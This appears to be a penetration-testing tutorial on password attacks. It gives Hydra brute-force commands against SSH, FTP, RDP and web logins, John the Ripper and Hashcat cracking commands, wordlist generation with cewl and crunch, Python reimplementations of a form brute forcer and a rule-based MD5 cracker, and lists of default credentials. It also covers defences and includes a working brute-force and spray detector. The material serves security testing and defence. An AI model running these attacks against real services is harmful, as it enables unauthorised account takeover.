Advanced password attack techniques for various protocols and services.
Password attacks remain one of the most effective initial access vectors. Online attacks (Hydra) send each guess to a live service, so they are slow, noisy, and subject to rate limiting and account lockout; offline attacks (John the Ripper, Hashcat) run against captured hashes at whatever speed the hardware allows, with nothing on the target to notice. Mastering both is essential for any security researcher.
Hydra: Online Password Attacks
# SSH brute force with a username list (-L) and a password list (-P)
hydra -L usernames.txt -P passwords.txt ssh://target.com
# HTTP POST form attacks: ^USER^ and ^PASS^ are substituted into the form body; F= is a string
# that appears in the response only when the login FAILS. Copy it from a real failed-login
# response first: a marker the application never emits turns every guess into a "hit"
hydra -l admin -P passlist.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect"
# FTP attacks
hydra -L users.txt -P passwords.txt ftp://target.com
# RDP attacks for Windows environments: one task (-t 1), verbose (-V), stop on the first hit (-f);
# RDP rejects parallel connections and domain accounts lock out after a handful of failures
hydra -t 1 -V -f -L users.txt -P passwords.txt rdp://192.168.1.100
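The http-post-form line above stands or falls on the F= failure string, so here is the decision logic behind it, as an added example that is not hydra's code. It runs a throwaway login endpoint on 127.0.0.1 (the endpoint, its single valid credential and the guess list are all constructed for the demo), substitutes ^USER^/^PASS^ into the body template the way hydra does, and treats a guess as a hit when the failure string is absent from the response. The second call in demo() uses a failure string the application never emits and shows why that yields false positives on the very first guess.

```python
"""Added example (not hydra's code): the logic behind hydra's http-post-form
module, run against a throwaway login endpoint on 127.0.0.1. The endpoint,
its credential store and the candidate lists are constructed for the demo."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed credential store for the mock target (assumption, not a real site).
VALID_CREDS = {"admin": "Winter2024!"}


class LoginHandler(BaseHTTPRequestHandler):
    """Mock /login.php: a failed login says 'incorrect', a success does not."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDS.get(user) == password:
            body = b"<h1>Welcome back</h1>"
        else:
            body = b"<p>Login incorrect, please try again</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo output quiet


def start_mock_target():
    server = ThreadingHTTPServer(("127.0.0.1", 0), LoginHandler)  # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# urllib honours http_proxy by default; a loopback target must bypass it.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def http_post_form_attack(base_url, spec, users, passwords, stop_on_first=True):
    """spec uses hydra's layout: "/path:body-with-^USER^-and-^PASS^:F=failure-string".
    A guess counts as a hit when the failure string is ABSENT from the response."""
    path, template, condition = spec.split(":", 2)
    if not condition.startswith("F="):
        raise ValueError("only F= (failure string) conditions are modelled here")
    fail_marker = condition[2:]
    hits = []
    for user in users:
        for password in passwords:
            # URL-encode the substituted values so '&' or '=' in a guess cannot break the body
            body = (template.replace("^USER^", urllib.parse.quote(user, safe=""))
                            .replace("^PASS^", urllib.parse.quote(password, safe="")))
            req = urllib.request.Request(
                base_url + path, data=body.encode(),
                headers={"Content-Type": "application/x-www-form-urlencoded"})
            with _opener.open(req) as resp:
                page = resp.read().decode(errors="replace")
            if fail_marker not in page:
                hits.append((user, password))
                if stop_on_first:  # hydra -f
                    return hits
    return hits


def demo():
    """Returns (hits with a correct F= string, hits with a wrong F= string)."""
    server = start_mock_target()
    try:
        base = "http://127.0.0.1:%d" % server.server_address[1]
        users = ["admin"]
        guesses = ["password", "admin123", "Winter2024!", "letmein"]
        right = http_post_form_attack(
            base, "/login.php:username=^USER^&password=^PASS^:F=incorrect", users, guesses)
        # A failure marker the application never emits turns every guess into a false positive:
        wrong = http_post_form_attack(
            base, "/login.php:username=^USER^&password=^PASS^:F=Invalid credentials", users, guesses)
        return right, wrong
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

Before a real run, send one known-bad login with curl or the browser and take F= from that response body; if the application returns a redirect or a different status code on failure, hydra's S= (success string) or a header check is the better condition.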
John the Ripper: Offline Password Cracking
# Basic password hash cracking (a 32-hex digest is ambiguous, so name the format)
john --format=raw-md5 hashes.txt
# Wordlist mode with rules: each word is mangled by the default Wordlist rule set
john --format=raw-md5 --wordlist=rockyou.txt --rules hashes.txt
# Incremental mode: exhaustive search over a character set; it never finishes on its own,
# so run it last and time-bound it after wordlist+rules has taken the easy hashes
john --format=raw-md5 --incremental hashes.txt
# Show cracked passwords (read back from john.pot)
john --format=raw-md5 --show hashes.txt
Advanced Hashcat Integration:
# Stream John's rule-mangled candidates into Hashcat over stdin: with -a 0 and no wordlist
# argument, hashcat reads candidates from stdin; -m 0 is raw MD5
john --wordlist=rockyou.txt --rules --stdout | hashcat -m 0 -a 0 hashes.txt
# GPU-accelerated cracking of NTLM hashes (-m 1000); if the file is user:hash, add --username.
# Do not add --force: it only suppresses driver and hardware warnings instead of fixing them
hashcat -m 1000 -a 0 nt_hashes.txt rockyou.txt
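Both the John wordlist+rules commands and the john --stdout | hashcat pipeline above rely on the same two pieces: a candidate generator and a hash-and-compare consumer. The following is an added example (not John's or Hashcat's code) that shows them in working Python: apply_rule() interprets a small subset of John's rule language, candidates() is the stream --stdout would print, crack_md5() hashes each candidate once and looks it up against every target the way hashcat -m 0 does when reading stdin, and show() mimics --show. The wordlist, the rules and the user:hash file are constructed; the hash file is built by hashing plaintexts chosen for the demo so the result checks itself.

```python
"""Added example (not John's or Hashcat's code): what happens inside
`john --wordlist --rules` and `john --stdout | hashcat`. apply_rule()
interprets a small subset of John's rule language, candidates() is the
stream --stdout would print, and crack_md5() is the consumer that hashes
and compares, as hashcat -m 0 does when reading stdin. The hash file is
constructed by hashing known plaintexts so the demo checks itself."""
import hashlib
from typing import Dict, Iterable, Iterator, List


def apply_rule(word: str, rule: str) -> str:
    """Subset of John's rule language: ':' no-op, 'l' lower, 'u' upper,
    'c' capitalize, 'r' reverse, '$X' append X, '^X' prepend X, 'sXY' replace X with Y."""
    out, i = word, 0
    while i < len(rule):
        cmd = rule[i]
        if cmd == ":":
            pass
        elif cmd == "l":
            out = out.lower()
        elif cmd == "u":
            out = out.upper()
        elif cmd == "c":
            out = out[:1].upper() + out[1:].lower()
        elif cmd == "r":
            out = out[::-1]
        elif cmd == "$":
            i += 1
            out = out + rule[i]
        elif cmd == "^":
            i += 1
            out = rule[i] + out
        elif cmd == "s":
            out = out.replace(rule[i + 1], rule[i + 2])
            i += 2
        else:
            raise ValueError("unsupported rule command %r" % cmd)
        i += 1
    return out


# A few rules in John syntax, in the spirit of the default Wordlist rule set (constructed).
RULES = [":", "c", "u", "r", "$1", "$!", "c$1", "c$!", "c$2$0$2$3", "csa4se3so0"]


def candidates(wordlist: Iterable[str], rules=RULES) -> Iterator[str]:
    """The stream `john --wordlist=... --rules --stdout` emits, one candidate per line,
    with duplicates suppressed."""
    seen = set()
    for word in wordlist:
        for rule in rules:
            cand = apply_rule(word, rule)
            if cand not in seen:
                seen.add(cand)
                yield cand


def load_hashes(text: str) -> Dict[str, str]:
    """Parse john's user:hash input layout into {hash: user}."""
    targets = {}
    for line in text.splitlines():
        if ":" in line:
            user, digest = line.split(":", 1)
            targets[digest.strip().lower()] = user
    return targets


def crack_md5(hash_text: str, stream: Iterable[str]) -> Dict[str, str]:
    """Hash every candidate once and look it up against all targets
    (unsalted MD5: one hash per guess covers every user at once)."""
    targets = load_hashes(hash_text)
    cracked: Dict[str, str] = {}
    for cand in stream:
        user = targets.get(hashlib.md5(cand.encode()).hexdigest())
        if user is not None and user not in cracked:
            cracked[user] = cand
            if len(cracked) == len(targets):
                break
    return cracked


def show(hash_text: str, cracked: Dict[str, str]) -> List[str]:
    """Output shaped like `john --show`: user:password lines, then a summary."""
    total = len(load_hashes(hash_text))
    lines = ["%s:%s" % (u, p) for u, p in cracked.items()]
    lines.append("%d password hashes cracked, %d left" % (len(cracked), total - len(cracked)))
    return lines


# Constructed demo input: a wordlist and a hash file whose plaintexts we chose ourselves.
WORDLIST = ["summer", "password", "dragon", "welcome"]
_DEMO_PLAINTEXTS = {"alice": "Summer2023", "bob": "password1",
                    "carol": "Dr4g0n", "dave": "correct horse battery staple"}
HASH_FILE = "\n".join("%s:%s" % (u, hashlib.md5(p.encode()).hexdigest())
                      for u, p in _DEMO_PLAINTEXTS.items())

if __name__ == "__main__":
    print("\n".join(show(HASH_FILE, crack_md5(HASH_FILE, candidates(WORDLIST)))))
```

The unsalted lookup in crack_md5() is why fast hashes fall so quickly: ten rules over four words produce under forty candidates, yet three of four accounts crack, and the one passphrase that no rule derives from the wordlist stays uncracked no matter how long incremental mode runs. A salted or slow hash (bcrypt, Argon2) removes the one-hash-covers-all-users shortcut and multiplies the cost of every guess.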
Protocol-Specific Attack Strategies:
- SSH: try vendor default and service-account credentials; keep the task count low, since sshd's MaxStartups and fail2ban-style blocking cut parallel attempts short
- HTTP forms: capture one real login request to get the parameter names, hidden fields such as CSRF tokens, and the exact failure string
- Database services: MySQL and PostgreSQL default credentials (root with an empty password, postgres/postgres)
- Network services: SNMP community strings (public, private), Telnet logins
Password Analysis and Wordlist Creation:
# Generate a custom wordlist from the target's own web content (words of 6+ characters)
cewl https://target.com -m 6 -w custom_wordlist.txt
# Generate candidates shaped like the target's password policy: @ lowercase, % digit, ^ symbol.
# With -t the min and max length must both equal the pattern length (8 here)
crunch 8 8 -t @@@%%%^^ -o policy_wordlist.txt
# Combine and de-duplicate wordlists (LC_ALL=C keeps sort byte-exact and fast)
cat wordlist1.txt wordlist2.txt | LC_ALL=C sort -u > combined_wordlist.txt
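As an added example (not cewl's or crunch's code), this puts the wordlist-building steps above into working Python so the size and shape of what they produce can be checked before anything is written to disk: expand_pattern() models crunch's -t placeholders as a generator and pattern_size() counts the candidates first, meets_policy() encodes a constructed 8-12 character, three-class policy, and merge_wordlists() does what cat | sort -u does while preserving the original order (most likely words first), stripping CR/LF artefacts and dropping anything the policy would never have accepted. The symbol set and both word lists are constructed and differ from crunch's defaults.

```python
"""Added example (not cewl's or crunch's code): shaping a wordlist to a
password policy. expand_pattern() models crunch's -t placeholders as a
generator, meets_policy() encodes a constructed policy, and merge_wordlists()
combines several lists, strips CR/LF artefacts, de-duplicates in order and
keeps only policy-compliant words. The symbol set and all word lists are
constructed and differ from crunch's defaults."""
import itertools
import string
from typing import Callable, Iterable, Iterator, List

SYMBOLS = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/"  # constructed symbol class
# crunch -t placeholders: @ lowercase, , uppercase, % digit, ^ symbol; anything else is literal.
PLACEHOLDERS = {"@": string.ascii_lowercase, ",": string.ascii_uppercase,
                "%": string.digits, "^": SYMBOLS}


def pattern_size(pattern: str) -> int:
    """Number of candidates a pattern expands to: check this before writing to disk."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size


def expand_pattern(pattern: str) -> Iterator[str]:
    """Yield every string matching the pattern, first position varying slowest (like crunch)."""
    pools = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    for combo in itertools.product(*pools):
        yield "".join(combo)


def meets_policy(word: str, min_len: int = 8, max_len: int = 12, min_classes: int = 3) -> bool:
    """Constructed policy: 8-12 characters drawn from at least three character classes."""
    classes = (any(c.islower() for c in word), any(c.isupper() for c in word),
               any(c.isdigit() for c in word), any(c in SYMBOLS for c in word))
    return min_len <= len(word) <= max_len and sum(classes) >= min_classes


def merge_wordlists(*lists: Iterable[str], keep: Callable[[str], bool] = meets_policy) -> List[str]:
    """Like `cat ... | sort -u`, but order-preserving (most likely words first) and policy-filtered."""
    seen, merged = set(), []
    for source in lists:
        for raw in source:
            word = raw.rstrip("\r\n")  # rockyou-style CRLF line endings
            if word and word not in seen and keep(word):
                seen.add(word)
                merged.append(word)
    return merged


# Constructed inputs: a cewl-style list scraped from the target and a rockyou-style leaked list.
CEWL_WORDS = ["Acme", "acmecorp", "Widgets", "Springfield", "Acme2024!\r\n"]
LEAKED_WORDS = ["password", "Password1!", "123456", "Acme2024!", "letmein", "Spring2024!"]

if __name__ == "__main__":
    print(pattern_size("@@@%%%^^"), "candidates for @@@%%%^^")
    print(merge_wordlists(CEWL_WORDS, LEAKED_WORDS))
    # A company name plus four digits and one symbol is a far smaller, far more likely space
    print(pattern_size("Acme%%%%^"), "Acme2024!" in expand_pattern("Acme%%%%^"))
```

The point of pattern_size() is that @@@%%%^^ alone is tens of millions of lines; a literal prefix taken from the cewl output, such as the Acme%%%%^ pattern in the demo, is a few hundred thousand and contains the guesses people actually make under such a policy.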
Real-World Case Study:
During a penetration test, we recovered password hashes from a compromised database:
- Used SQL injection to extract MD5 password hashes
- John cracked 40% of hashes in under 2 hours using wordlist+rules
- Discovered password reuse across multiple services
- Gained domain admin access through reused credentials
Defensive Countermeasures:
- Store passwords with a slow, salted hash (bcrypt, scrypt or Argon2) rather than unsalted MD5 or NTLM; the hashes in the case study cracked because hashing them was cheap
- Implement account lockout or progressive delays, and pair per-account lockout with per-source rate limiting: a password spray makes one guess per account and never trips a per-account counter
- Use multi-factor authentication, so a cracked or reused password is not sufficient on its own
- Enforce strong password policies: length over complexity rules, and screen new passwords against breached-password lists
- Monitor for brute force attempts: many failures from one source, many distinct usernames from one source, and a success that follows a burst of failures
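The monitoring bullet above names three patterns; here they are as working detection logic, an added example that is not part of the original page, run over constructed OpenSSH auth.log lines. Per source IP it keeps a sliding window of failures and raises a brute-force alert on a burst, a spray alert when the failures in the window hit many distinct accounts (the case per-account lockout never sees), and a success-after-failures alert when an Accepted line follows a burst from the same source. The thresholds, the hostname, the process IDs and the addresses are constructed; syslog timestamps carry no year, so the parser takes one as a parameter.

```python
"""Added example (not from the original page): detection logic for the
'monitor for brute force attempts' bullet, run over constructed OpenSSH
auth.log lines. Thresholds, hostnames, PIDs and addresses are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import List, Optional, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$")


def parse(line: str, year: int = 2024) -> Optional[Tuple[datetime, str, str, str]]:
    """Return (timestamp, 'Failed'|'Accepted', user, ip), or None for lines we do not model.
    syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("result"), m.group("user"), m.group("ip")


def detect(lines, window_s=60, fail_threshold=5, spray_users=3, success_after=3, year=2024) -> List[tuple]:
    """Sliding-window detection per source IP. Alerts:
    ('brute_force', ip)                  >= fail_threshold failures inside the window
    ('spray', ip)                        failures against >= spray_users distinct accounts
    ('success_after_failures', ip, user) an Accepted line after >= success_after failures"""
    fails = defaultdict(deque)      # ip -> failure timestamps inside the window
    fail_users = defaultdict(dict)  # ip -> {user: timestamp of last failure}
    alerts, fired = [], set()
    for line in lines:
        event = parse(line, year)
        if event is None:
            continue
        ts, result, user, ip = event
        window = fails[ip]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()  # expire failures older than the window
        if result == "Failed":
            window.append(ts)
            fail_users[ip][user] = ts
            if len(window) >= fail_threshold and ("brute_force", ip) not in fired:
                fired.add(("brute_force", ip))
                alerts.append(("brute_force", ip))
            recent = [u for u, t in fail_users[ip].items() if (ts - t).total_seconds() <= window_s]
            if len(recent) >= spray_users and ("spray", ip) not in fired:
                fired.add(("spray", ip))
                alerts.append(("spray", ip))
        elif len(window) >= success_after:
            # the attacker got in: this is the alert that matters most
            alerts.append(("success_after_failures", ip, user))
    return alerts


# Constructed auth.log excerpt: a burst against root that succeeds, a spray across
# four accounts, and one legitimate typo followed by a successful login.
SAMPLE_LOG = """\
Mar 10 14:00:01 bastion sshd[2231]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 10 14:00:03 bastion sshd[2233]: Failed password for root from 203.0.113.7 port 51236 ssh2
Mar 10 14:00:05 bastion sshd[2235]: Failed password for root from 203.0.113.7 port 51238 ssh2
Mar 10 14:00:07 bastion sshd[2237]: Failed password for root from 203.0.113.7 port 51240 ssh2
Mar 10 14:00:09 bastion sshd[2239]: Failed password for root from 203.0.113.7 port 51242 ssh2
Mar 10 14:00:11 bastion sshd[2241]: Failed password for root from 203.0.113.7 port 51244 ssh2
Mar 10 14:00:20 bastion sshd[2243]: Accepted password for root from 203.0.113.7 port 51246 ssh2
Mar 10 14:01:00 bastion sshd[2250]: Failed password for alice from 198.51.100.9 port 40001 ssh2
Mar 10 14:01:02 bastion sshd[2252]: Failed password for invalid user bob from 198.51.100.9 port 40002 ssh2
Mar 10 14:01:04 bastion sshd[2254]: Failed password for carol from 198.51.100.9 port 40003 ssh2
Mar 10 14:01:06 bastion sshd[2256]: Failed password for dave from 198.51.100.9 port 40004 ssh2
Mar 10 14:02:00 bastion sshd[2260]: Failed password for alice from 192.0.2.5 port 50011 ssh2
Mar 10 14:02:05 bastion sshd[2262]: Accepted password for alice from 192.0.2.5 port 50012 ssh2
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```

Note that 198.51.100.9 never reaches the brute-force threshold and never locks any account (one failure per user), which is exactly why the spray rule keys on distinct usernames per source rather than on failures per account. The hydra -t 1 RDP run shown earlier produces the same per-source burst signature this detector flags.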
Key Takeaways
- Implement proper authorization and authentication
- Regular security assessments and penetration testing
- Stay updated with latest security threats and patches
- Follow ethical hacking principles and responsible disclosure
Pro Tip
Always conduct security testing in authorized environments only and follow responsible disclosure practices.